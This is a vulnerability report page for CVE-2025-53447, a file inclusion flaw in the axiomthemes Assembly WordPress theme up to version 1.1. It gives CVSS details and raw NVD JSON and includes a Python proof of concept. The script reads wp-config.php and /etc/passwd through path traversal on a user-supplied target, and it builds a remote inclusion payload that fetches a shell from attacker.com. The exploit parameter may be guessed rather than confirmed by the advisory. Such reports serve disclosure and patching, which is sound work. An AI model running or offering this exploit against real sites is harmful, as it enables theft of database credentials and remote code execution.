Security Vulnerability Report
中文
CVE-2025-53447 CVSS 8.1 HIGH

CVE-2025-53447

Published: 2025-12-18 08:15:55
Last Modified: 2026-01-20 15:16:58

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Assembly assembly allows PHP Local File Inclusion.This issue affects Assembly: from n/a through <= 1.1.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:assembly:*:*:*:*:*:wordpress:*:* - VULNERABLE
Assembly Theme <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53447 PoC - Assembly Theme LFI/RFI # Target: WordPress site using Assembly theme <= 1.1 import requests import sys target = input("Enter target URL (e.g., http://target.com): ").rstrip('/') # LFI PoC - Read wp-config.php print("[*] Testing Local File Inclusion...") lfi_payload = "/?file=../../../../../../wp-config.php" response = requests.get(target + lfi_payload) if "DB_NAME" in response.text or "define" in response.text: print("[+] LFI Successful! wp-config.php content:") print(response.text[:500]) else: print("[-] LFI may not be directly executable, checking response...") print(f"Status: {response.status_code}, Length: {len(response.text)}") # LFI PoC - Read /etc/passwd print("\n[*] Testing /etc/passwd read...") passwd_payload = "/?file=../../../../../../etc/passwd" response = requests.get(target + passwd_payload) if "root:" in response.text or "/bin/bash" in response.text: print("[+] /etc/passwd read successful!") print(response.text[:500]) # RFI PoC (if allow_url_include is enabled) print("\n[*] Testing Remote File Inclusion...") rfi_payload = "/?file=http://attacker.com/shell.txt" print(f"[!] RFI Payload: {target + rfi_payload}") print("[!] Note: RFI only works if PHP allow_url_include=On") print("\n[*] PoC completed. Manual verification recommended.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53447", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:55.140", "lastModified": "2026-01-20T15:16:57.907", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Assembly assembly allows PHP Local File Inclusion.This issue affects Assembly: from n/a through <= 1.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:assembly:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.1", "matchCriteriaId": "379351F6-71B1-4EFD-96D7-2839CDF297AD"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/assembly/vulnerability/wordpress-assembly-theme-1-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}